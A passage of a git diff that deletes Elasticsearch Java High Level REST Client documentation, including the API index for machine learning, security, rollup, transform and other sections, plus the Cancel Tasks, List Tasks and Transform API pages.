APIs: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -include::licensing/put-license.asciidoc[] -include::licensing/get-license.asciidoc[] -include::licensing/delete-license.asciidoc[] -include::licensing/start-trial.asciidoc[] -include::licensing/start-basic.asciidoc[] -include::licensing/get-trial-status.asciidoc[] -include::licensing/get-basic-status.asciidoc[] - -[role="xpack"] -== Machine Learning APIs -:upid: {mainid}-x-pack-ml -:doc-tests-file: {doc-tests}/MlClientDocumentationIT.java - -The Java High Level REST Client supports the following {ml} APIs: - -* <<{upid}-close-job>> -* <<{upid}-delete-job>> -* <<{upid}-delete-calendar-job>> -* <<{upid}-delete-calendar>> -* <<{upid}-delete-calendar-event>> -* <<{upid}-delete-data-frame-analytics>> -* <<{upid}-delete-datafeed>> -* <<{upid}-delete-expired-data>> -* <<{upid}-delete-filter>> -* <<{upid}-delete-forecast>> -* <<{upid}-delete-model-snapshot>> -* <<{upid}-delete-trained-models>> -* <<{upid}-estimate-model-memory>> -* <<{upid}-evaluate-data-frame>> -* <<{upid}-explain-data-frame-analytics>> -* <<{upid}-find-file-structure>> -* <<{upid}-flush-job>> -* <<{upid}-forecast-job>> -* <<{upid}-get-job>> -* <<{upid}-get-job-stats>> -* <<{upid}-get-buckets>> -* <<{upid}-get-calendars>> -* <<{upid}-get-calendar-events>> -* <<{upid}-get-categories>> -* <<{upid}-get-data-frame-analytics>> -* <<{upid}-get-data-frame-analytics-stats>> -* <<{upid}-get-datafeed>> -* <<{upid}-get-datafeed-stats>> -* <<{upid}-get-filters>> -* <<{upid}-get-influencers>> -* <<{upid}-get-ml-info>> -* <<{upid}-get-model-snapshots>> -* <<{upid}-get-overall-buckets>> -* <<{upid}-get-records>> -* <<{upid}-get-trained-models>> -* <<{upid}-get-trained-models-stats>> -* <<{upid}-open-job>> -* <<{upid}-post-calendar-event>> -* <<{upid}-post-data>> -* <<{upid}-preview-datafeed>> -* <<{upid}-put-job>> -* <<{upid}-put-calendar-job>> -* <<{upid}-put-calendar>> -* <<{upid}-put-data-frame-analytics>> -* <<{upid}-put-datafeed>> -* <<{upid}-put-filter>> -* <<{upid}-put-trained-model>> -* <<{upid}-revert-model-snapshot>> -* <<{upid}-set-upgrade-mode>> -* <<{upid}-start-data-frame-analytics>> -* <<{upid}-start-datafeed>> -* <<{upid}-stop-data-frame-analytics>> -* <<{upid}-stop-datafeed>> -* <<{upid}-update-job>> -* <<{upid}-update-data-frame-analytics>> -* <<{upid}-update-datafeed>> -* <<{upid}-update-filter>> -* <<{upid}-update-model-snapshot>> - -// CLOSE -include::ml/close-job.asciidoc[] -// DELETE -include::ml/delete-job.asciidoc[] -include::ml/delete-calendar-job.asciidoc[] -include::ml/delete-calendar-event.asciidoc[] -include::ml/delete-calendar.asciidoc[] -include::ml/delete-data-frame-analytics.asciidoc[] -include::ml/delete-datafeed.asciidoc[] -include::ml/delete-expired-data.asciidoc[] -include::ml/delete-filter.asciidoc[] -include::ml/delete-forecast.asciidoc[] -include::ml/delete-model-snapshot.asciidoc[] -include::ml/delete-trained-models.asciidoc[] -// ESTIMATE -include::ml/estimate-model-memory.asciidoc[] -// EVALUATE -include::ml/evaluate-data-frame.asciidoc[] -// EXPLAIN -include::ml/explain-data-frame-analytics.asciidoc[] -// FIND -include::ml/find-file-structure.asciidoc[] -// FLUSH -include::ml/flush-job.asciidoc[] -// FORECAST -include::ml/forecast-job.asciidoc[] -// GET -include::ml/get-job.asciidoc[] -include::ml/get-job-stats.asciidoc[] -include::ml/get-buckets.asciidoc[] -include::ml/get-calendar-events.asciidoc[] -include::ml/get-calendars.asciidoc[] -include::ml/get-categories.asciidoc[] -include::ml/get-data-frame-analytics.asciidoc[] -include::ml/get-data-frame-analytics-stats.asciidoc[] -include::ml/get-datafeed.asciidoc[] -include::ml/get-datafeed-stats.asciidoc[] -include::ml/get-filters.asciidoc[] -include::ml/get-influencers.asciidoc[] -include::ml/get-info.asciidoc[] -include::ml/get-model-snapshots.asciidoc[] -include::ml/get-overall-buckets.asciidoc[] -include::ml/get-records.asciidoc[] -include::ml/get-trained-models.asciidoc[] -include::ml/get-trained-models-stats.asciidoc[] -// OPEN -include::ml/open-job.asciidoc[] -// POST -include::ml/post-calendar-event.asciidoc[] -include::ml/post-data.asciidoc[] -// PREVIEW -include::ml/preview-datafeed.asciidoc[] -// PUT -include::ml/put-job.asciidoc[] -include::ml/put-calendar-job.asciidoc[] -include::ml/put-calendar.asciidoc[] -include::ml/put-data-frame-analytics.asciidoc[] -include::ml/put-datafeed.asciidoc[] -include::ml/put-filter.asciidoc[] -include::ml/put-trained-model.asciidoc[] -// REVERT -include::ml/revert-model-snapshot.asciidoc[] -// SET -include::ml/set-upgrade-mode.asciidoc[] -// START -include::ml/start-data-frame-analytics.asciidoc[] -include::ml/start-datafeed.asciidoc[] -// STOP -include::ml/stop-data-frame-analytics.asciidoc[] -include::ml/stop-datafeed.asciidoc[] -// UPDATE -include::ml/update-job.asciidoc[] -include::ml/update-data-frame-analytics.asciidoc[] -include::ml/update-datafeed.asciidoc[] -include::ml/update-filter.asciidoc[] -include::ml/update-model-snapshot.asciidoc[] - -== Migration APIs - -:upid: {mainid}-migration -:doc-tests-file: {doc-tests}/MigrationClientDocumentationIT.java - -The Java High Level REST Client supports the following Migration APIs: - -* <<{upid}-get-deprecation-info>> - -include::migration/get-deprecation-info.asciidoc[] - -[role="xpack"] -== Rollup APIs - -:upid: {mainid}-rollup -:doc-tests-file: {doc-tests}/RollupDocumentationIT.java - -The Java High Level REST Client supports the following Rollup APIs: - -* <> -* <<{upid}-rollup-start-job>> -* <<{upid}-rollup-stop-job>> -* <<{upid}-rollup-delete-job>> -* <> -* <<{upid}-search>> -* <<{upid}-x-pack-rollup-get-rollup-caps>> -* <<{upid}-x-pack-rollup-get-rollup-index-caps>> - -include::rollup/put_job.asciidoc[] -include::rollup/start_job.asciidoc[] -include::rollup/stop_job.asciidoc[] -include::rollup/delete_job.asciidoc[] -include::rollup/get_job.asciidoc[] -include::rollup/search.asciidoc[] -include::rollup/get_rollup_caps.asciidoc[] -include::rollup/get_rollup_index_caps.asciidoc[] - -[role="xpack"] -== Security APIs - -:upid: {mainid}-security -:doc-tests-file: {doc-tests}/SecurityDocumentationIT.java - -The Java High Level REST Client supports the following Security APIs: - -* <> -* <<{upid}-get-users>> -* <<{upid}-delete-user>> -* <> -* <> -* <> -* <<{upid}-put-role>> -* <<{upid}-get-roles>> -* <> -* <<{upid}-clear-roles-cache>> -* <<{upid}-clear-privileges-cache>> -* <<{upid}-clear-realm-cache>> -* <<{upid}-clear-api-key-cache>> -* <<{upid}-authenticate>> -* <<{upid}-has-privileges>> -* <<{upid}-get-user-privileges>> -* <> -* <> -* <> -* <> -* <> -* <<{upid}-invalidate-token>> -* <<{upid}-get-builtin-privileges>> -* <<{upid}-get-privileges>> -* <<{upid}-put-privileges>> -* <<{upid}-delete-privileges>> -* <<{upid}-create-api-key>> -* <<{upid}-get-api-key>> -* <<{upid}-invalidate-api-key>> - -include::security/put-user.asciidoc[] -include::security/get-users.asciidoc[] -include::security/delete-user.asciidoc[] -include::security/enable-user.asciidoc[] -include::security/disable-user.asciidoc[] -include::security/change-password.asciidoc[] -include::security/put-role.asciidoc[] -include::security/get-roles.asciidoc[] -include::security/delete-role.asciidoc[] -include::security/delete-privileges.asciidoc[] -include::security/get-builtin-privileges.asciidoc[] -include::security/get-privileges.asciidoc[] -include::security/clear-roles-cache.asciidoc[] -include::security/clear-privileges-cache.asciidoc[] -include::security/clear-realm-cache.asciidoc[] -include::security/clear-api-key-cache.asciidoc[] -include::security/authenticate.asciidoc[] -include::security/has-privileges.asciidoc[] -include::security/get-user-privileges.asciidoc[] -include::security/get-certificates.asciidoc[] -include::security/put-role-mapping.asciidoc[] -include::security/get-role-mappings.asciidoc[] -include::security/delete-role-mapping.asciidoc[] -include::security/create-token.asciidoc[] -include::security/invalidate-token.asciidoc[] -include::security/put-privileges.asciidoc[] -include::security/create-api-key.asciidoc[] -include::security/get-api-key.asciidoc[] -include::security/invalidate-api-key.asciidoc[] - -[role="xpack"] -== Watcher APIs - -:upid: {mainid}-watcher -:doc-tests-file: {doc-tests}/WatcherDocumentationIT.java - -The Java High Level REST Client supports the following Watcher APIs: - -* <<{upid}-start-watch-service>> -* <<{upid}-stop-watch-service>> -* <> -* <<{upid}-get-watch>> -* <> -* <> -* <<{upid}-ack-watch>> -* <<{upid}-activate-watch>> -* <<{upid}-execute-watch>> -* <<{upid}-watcher-stats>> - -include::watcher/start-watch-service.asciidoc[] -include::watcher/stop-watch-service.asciidoc[] -include::watcher/put-watch.asciidoc[] -include::watcher/get-watch.asciidoc[] -include::watcher/delete-watch.asciidoc[] -include::watcher/ack-watch.asciidoc[] -include::watcher/deactivate-watch.asciidoc[] -include::watcher/activate-watch.asciidoc[] -include::watcher/execute-watch.asciidoc[] -include::watcher/watcher-stats.asciidoc[] - -[role="xpack"] -== Graph APIs - -The Java High Level REST Client supports the following Graph APIs: - -* <> - -include::graph/explore.asciidoc[] - -//// -Clear attributes that we use to document that APIs included above so they -don't leak into the rest of the documentation. -//// --- -:api!: -:request!: -:response!: -:doc-tests-file!: -:upid!: --- - -[role="xpack"] -== CCR APIs - -:upid: {mainid}-ccr -:doc-tests-file: {doc-tests}/CCRDocumentationIT.java - -The Java High Level REST Client supports the following CCR APIs: - -* <<{upid}-ccr-put-follow>> -* <<{upid}-ccr-pause-follow>> -* <<{upid}-ccr-resume-follow>> -* <<{upid}-ccr-unfollow>> -* <<{upid}-ccr-forget-follower>> -* <<{upid}-ccr-put-auto-follow-pattern>> -* <<{upid}-ccr-delete-auto-follow-pattern>> -* <<{upid}-ccr-get-auto-follow-pattern>> -* <<{upid}-ccr-pause-auto-follow-pattern>> -* <<{upid}-ccr-resume-auto-follow-pattern>> -* <<{upid}-ccr-get-stats>> -* <<{upid}-ccr-get-follow-stats>> -* <<{upid}-ccr-get-follow-info>> - -include::ccr/put_follow.asciidoc[] -include::ccr/pause_follow.asciidoc[] -include::ccr/resume_follow.asciidoc[] -include::ccr/unfollow.asciidoc[] -include::ccr/forget_follower.asciidoc[] -include::ccr/put_auto_follow_pattern.asciidoc[] -include::ccr/delete_auto_follow_pattern.asciidoc[] -include::ccr/get_auto_follow_pattern.asciidoc[] -include::ccr/pause_auto_follow_pattern.asciidoc[] -include::ccr/resume_auto_follow_pattern.asciidoc[] -include::ccr/get_stats.asciidoc[] -include::ccr/get_follow_stats.asciidoc[] -include::ccr/get_follow_info.asciidoc[] - -[role="xpack"] -== Index Lifecycle Management APIs - -:upid: {mainid}-ilm -:doc-tests-file: {doc-tests}/ILMDocumentationIT.java - -The Java High Level REST Client supports the following Index Lifecycle -Management APIs: - -* <<{upid}-ilm-put-lifecycle-policy>> -* <<{upid}-ilm-delete-lifecycle-policy>> -* <<{upid}-ilm-get-lifecycle-policy>> -* <<{upid}-ilm-explain-lifecycle>> -* <<{upid}-ilm-start-ilm>> -* <<{upid}-ilm-stop-ilm>> -* <<{upid}-ilm-status>> -* <<{upid}-ilm-retry-lifecycle-policy>> -* <<{upid}-ilm-remove-lifecycle-policy-from-index>> - - -include::ilm/put_lifecycle_policy.asciidoc[] -include::ilm/delete_lifecycle_policy.asciidoc[] -include::ilm/get_lifecycle_policy.asciidoc[] -include::ilm/explain_lifecycle.asciidoc[] -include::ilm/start_lifecycle_management.asciidoc[] -include::ilm/stop_lifecycle_management.asciidoc[] -include::ilm/lifecycle_management_status.asciidoc[] -include::ilm/retry_lifecycle_policy.asciidoc[] -include::ilm/remove_lifecycle_policy_from_index.asciidoc[] - -[role="xpack"] -== Snapshot Lifecycle Management APIs - -:upid: {mainid}-ilm -:doc-tests-file: {doc-tests}/ILMDocumentationIT.java - -The Java High Level REST Client supports the following Snapshot Lifecycle -Management APIs: - -* <<{upid}-slm-put-snapshot-lifecycle-policy>> -* <<{upid}-slm-delete-snapshot-lifecycle-policy>> -* <<{upid}-ilm-get-lifecycle-policy>> -* <<{upid}-slm-start-slm>> -* <<{upid}-slm-stop-slm>> -* <<{upid}-slm-status>> -* <<{upid}-slm-execute-snapshot-lifecycle-policy>> -* <<{upid}-slm-execute-snapshot-lifecycle-retention>> - - -include::ilm/put_snapshot_lifecycle_policy.asciidoc[] -include::ilm/delete_snapshot_lifecycle_policy.asciidoc[] -include::ilm/get_snapshot_lifecycle_policy.asciidoc[] -include::ilm/start_snapshot_lifecycle_management.asciidoc[] -include::ilm/stop_snapshot_lifecycle_management.asciidoc[] -include::ilm/snapshot_lifecycle_management_status.asciidoc[] -include::ilm/execute_snapshot_lifecycle_policy.asciidoc[] -include::ilm/execute_snapshot_lifecycle_retention.asciidoc[] - - -[role="xpack"] -[[transform_apis]] -== {transform-cap} APIs - -:upid: {mainid} -:doc-tests-file: {doc-tests}/TransformDocumentationIT.java - -The Java High Level REST Client supports the following {transform} -APIs: - -* <<{upid}-get-transform>> -* <<{upid}-get-transform-stats>> -* <<{upid}-put-transform>> -* <<{upid}-update-transform>> -* <<{upid}-delete-transform>> -* <<{upid}-preview-transform>> -* <<{upid}-start-transform>> -* <<{upid}-stop-transform>> - -include::transform/get_transform.asciidoc[] -include::transform/get_transform_stats.asciidoc[] -include::transform/put_transform.asciidoc[] -include::transform/update_transform.asciidoc[] -include::transform/delete_transform.asciidoc[] -include::transform/preview_transform.asciidoc[] -include::transform/start_transform.asciidoc[] -include::transform/stop_transform.asciidoc[] - -== Enrich APIs - -:upid: {mainid}-enrich -:doc-tests-file: {doc-tests}/EnrichDocumentationIT.java - -The Java High Level REST Client supports the following Enrich APIs: - -* <<{upid}-enrich-put-policy>> -* <<{upid}-enrich-delete-policy>> -* <<{upid}-enrich-get-policy>> -* <<{upid}-enrich-stats>> -* <<{upid}-enrich-execute-policy>> - -include::enrich/put_policy.asciidoc[] -include::enrich/delete_policy.asciidoc[] -include::enrich/get_policy.asciidoc[] -include::enrich/stats.asciidoc[] -include::enrich/execute_policy.asciidoc[] diff --git a/docs/java-rest/high-level/tasks/cancel_tasks.asciidoc b/docs/java-rest/high-level/tasks/cancel_tasks.asciidoc deleted file mode 100644 index 69c317efa82..00000000000 --- a/docs/java-rest/high-level/tasks/cancel_tasks.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[java-rest-high-cluster-cancel-tasks]] -=== Cancel Tasks API - -The Cancel Tasks API allows cancellation of a currently running task. - -==== Cancel Tasks Request - -A `CancelTasksRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-request] --------------------------------------------------- -There are no required parameters. The task cancellation command supports the same -task selection parameters as the list tasks command. - -==== Parameters - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-request-filter] --------------------------------------------------- -<1> Cancel a task -<2> Cancel only cluster-related tasks -<3> Should the request block until the cancellation of the task and its child tasks is completed. -Otherwise, the request can return soon after the cancellation is started. Defaults to `false`. -<4> Cancel all tasks running on nodes nodeId1 and nodeId2 - -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-execute] --------------------------------------------------- - -==== Asynchronous Execution - -The asynchronous execution requires `CancelTasksRequest` instance and an -`ActionListener` instance to be passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-execute-async] --------------------------------------------------- -<1> The `CancelTasksRequest` to execute and the `ActionListener` to use -when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `CancelTasksResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. The raised exception is provided as an argument - -==== Cancel Tasks Response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-response-tasks] --------------------------------------------------- -<1> List of cancelled tasks - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-response-calc] --------------------------------------------------- -<1> List of cancelled tasks grouped by a node -<2> List of cancelled tasks grouped by a parent task - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-response-failures] --------------------------------------------------- -<1> List of node failures -<2> List of task cancellation failures - diff --git a/docs/java-rest/high-level/tasks/list_tasks.asciidoc b/docs/java-rest/high-level/tasks/list_tasks.asciidoc deleted file mode 100644 index e60ca61247e..00000000000 --- a/docs/java-rest/high-level/tasks/list_tasks.asciidoc +++ /dev/null @@ -1,101 +0,0 @@ -[[java-rest-high-tasks-list]] -=== List Tasks API - -The List Tasks API allows to get information about the tasks currently executing in the cluster. - -[[java-rest-high-cluster-list-tasks-request]] -==== List Tasks Request - -A `ListTasksRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-request] --------------------------------------------------- -There is no required parameters. By default the client will list all tasks and will not wait -for task completion. - -==== Parameters - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-request-filter] --------------------------------------------------- -<1> Request only cluster-related tasks -<2> Request all tasks running on nodes nodeId1 and nodeId2 -<3> Request only children of a particular task - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-request-detailed] --------------------------------------------------- -<1> Should the information include detailed, potentially slow to generate data. Defaults to `false` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-request-wait-completion] --------------------------------------------------- -<1> Should this request wait for all found tasks to complete. Defaults to `false` -<2> Timeout for the request as a `TimeValue`. Applicable only if `setWaitForCompletion` is `true`. -Defaults to 30 seconds -<3> Timeout as a `String` - -[[java-rest-high-cluster-list-tasks-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-execute] --------------------------------------------------- - -[[java-rest-high-cluster-list-tasks-async]] -==== Asynchronous Execution - -The asynchronous execution of a cluster update settings requires both the -`ListTasksRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-execute-async] --------------------------------------------------- -<1> The `ListTasksRequest` to execute and the `ActionListener` to use -when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `ListTasksResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. The raised exception is provided as an argument - -[[java-rest-high-cluster-list-tasks-response]] -==== List Tasks Response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-response-tasks] --------------------------------------------------- -<1> List of currently running tasks - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-response-calc] --------------------------------------------------- -<1> List of tasks grouped by a node -<2> List of tasks grouped by a parent task - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-response-failures] --------------------------------------------------- -<1> List of node failures -<2> List of tasks failures diff --git a/docs/java-rest/high-level/transform/delete_transform.asciidoc b/docs/java-rest/high-level/transform/delete_transform.asciidoc deleted file mode 100644 index 8416ce40e37..00000000000 --- a/docs/java-rest/high-level/transform/delete_transform.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ --- -:api: delete-transform -:request: DeleteTransformRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete {transform} API - -Deletes an existing {transform}. - -[id="{upid}-{api}-request"] -==== Delete {transform} request - -A +{request}+ object requires a non-null `id`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request referencing an existing {transform} -<2> Sets the optional argument `force`. When `true`, the {transform} -is deleted regardless of its current state. The default value is `false`, -meaning that only `stopped` {transforms} can be deleted. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ object acknowledges the {transform} deletion. diff --git a/docs/java-rest/high-level/transform/get_transform.asciidoc b/docs/java-rest/high-level/transform/get_transform.asciidoc deleted file mode 100644 index 64aa0f229c4..00000000000 --- a/docs/java-rest/high-level/transform/get_transform.asciidoc +++ /dev/null @@ -1,49 +0,0 @@ --- -:api: get-transform -:request: GetTransformRequest -:response: GetTransformResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get {transform} API - -Retrieves configuration information about one or more {transforms}. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Get {transform} request - -A +{request}+ requires either a {transform} ID, a comma separated list -of ids or the special wildcard `_all` to get all {transforms}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new GET request referencing an existing {transform} - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -{transforms} to skip. `size` specifies the maximum number of -{transforms} to get. Defaults to `0` and `100` respectively. -<2> Whether to ignore if a wildcard expression matches no {transforms}. - - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the requested {transforms}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/transform/get_transform_stats.asciidoc b/docs/java-rest/high-level/transform/get_transform_stats.asciidoc deleted file mode 100644 index cd2fcf2237c..00000000000 --- a/docs/java-rest/high-level/transform/get_transform_stats.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ --- -:api: get-transform-stats -:request: GetTransformStatsRequest -:response: GetTransformStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get {transform} stats API - -Retrieves the operational statistics of one or more {transforms}. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Get {transform} stats request - -A +{request}+ requires a {transform} id or the special wildcard `_all` -to get the statistics for all {transforms}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new GET Stats request referencing an existing {transform} - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -{transform} stats to skip. -`size` specifies the maximum number of {transform} stats to get. -Defaults to `0` and `100` respectively. -<2> Whether to ignore if a wildcard expression matches no {transforms}. - - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the requested {transform} statistics. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The response contains a list of `TransformStats` objects -<2> The running state of the {transform}, for example `started`, `indexing`, etc. -<3> The overall {transform} statistics recording the number of documents indexed etc. -<4> The progress of the current run in the {transform}. Supplies the number of docs left until the next checkpoint -and the total number of docs expected. -<5> The assigned node information if the task is currently assigned to a node and running. diff --git a/docs/java-rest/high-level/transform/preview_transform.asciidoc b/docs/java-rest/high-level/transform/preview_transform.asciidoc deleted file mode 100644 index 377aba597a6..00000000000 --- a/docs/java-rest/high-level/transform/preview_transform.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: preview-transform -:request: PreviewTransformRequest -:response: PreviewTransformResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Preview {transform} API - -Previews the results of a {transform}. - -The API accepts a +{request}+ object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Preview {transform} request - -A +{request}+ takes a single argument: a valid {transform} config. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The source config from which the data should be gathered -<2> The pivot config used to transform the data -<3> The configuration of the {transform} to preview - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the preview documents diff --git a/docs/java-rest/high-level/transform/put_transform.asciidoc b/docs/java-rest/high-level/transform/put_transform.asciidoc deleted file mode 100644 index 20aaaa74405..00000000000 --- a/docs/java-rest/high-level/transform/put_transform.asciidoc +++ /dev/null @@ -1,133 +0,0 @@ --- -:api: put-transform -:request: PutTransformRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put {transform} API - -Creates a new {transform}. - -The API accepts a +{request}+ object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Put {transform} request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {transform} to create -<2> Whether or not to wait to run deferrable validations until `_start` is called. -This option should be used with care as the created {transform} will run -with the privileges of the user creating it. Meaning, if they do not have privileges, -such an error will not be visible until `_start` is called. - -[id="{upid}-{api}-config"] -==== {transform-cap} configuration - -The `TransformConfig` object contains all the details about the -{transform} configuration and contains the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> The {transform} ID -<2> The source indices and query from which to gather data -<3> The destination index and optional pipeline -<4> How often to check for updates to the source indices -<5> The PivotConfig -<6> Optional free text description of the {transform} - -[id="{upid}-{api}-query-config"] - -==== SourceConfig - -The indices and the query from which to collect data. -If query is not set, a `match_all` query is used by default. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-config] --------------------------------------------------- - -==== DestConfig - -The index where to write the data and the optional pipeline -through which the docs should be indexed - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-dest-config] --------------------------------------------------- - -===== QueryConfig - -The query with which to select data from the source. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-query-config] --------------------------------------------------- - -==== PivotConfig - -Defines the pivot function `group by` fields and the aggregation to reduce the data. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-pivot-config] --------------------------------------------------- -<1> The `GroupConfig` to use in the pivot -<2> The aggregations to use - -===== GroupConfig -The grouping terms. Defines the group by and destination fields -which are produced by the pivot function. There are 3 types of -groups - -* Terms -* Histogram -* Date Histogram - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-group-config] --------------------------------------------------- -<1> The destination field -<2> Group by values of the `user_id` field - -===== AggregationConfig - -Defines the aggregations for the group fields. -// TODO link to the supported aggregations - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-agg-config] --------------------------------------------------- -<1> Aggregate the average star rating - -===== SettingsConfig - -Defines settings. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-config] --------------------------------------------------- -<1> The maximum paging size for the {transform} when pulling data -from the source. The size dynamically adjusts as the {transform} -is running to recover from and prevent OOM issues. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ acknowledges the successful creation of -the new {transform} or an error if the configuration is invalid. diff --git a/docs/java-rest/high-level/transform/start_transform.asciidoc b/docs/java-rest/high-level/transform/start_transform.asciidoc deleted file mode 100644 index 9de2a0da23d..00000000000 --- a/docs/java-rest/high-level/transform/start_transform.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ --- -:api: start-transform -:request: StartTransformRequest -:response: StartTransformResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start {transform} API - -Starts a {transform}. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Start {transform} request - -A +{request}+ object requires a non-null `id`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new start request referencing an existing -{transform} - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Controls the amount of time to wait until the {transform} starts. - -include::../execution.asciidoc[] - -==== Response - -The returned +{response}+ object acknowledges the {transform} has -started. diff --git 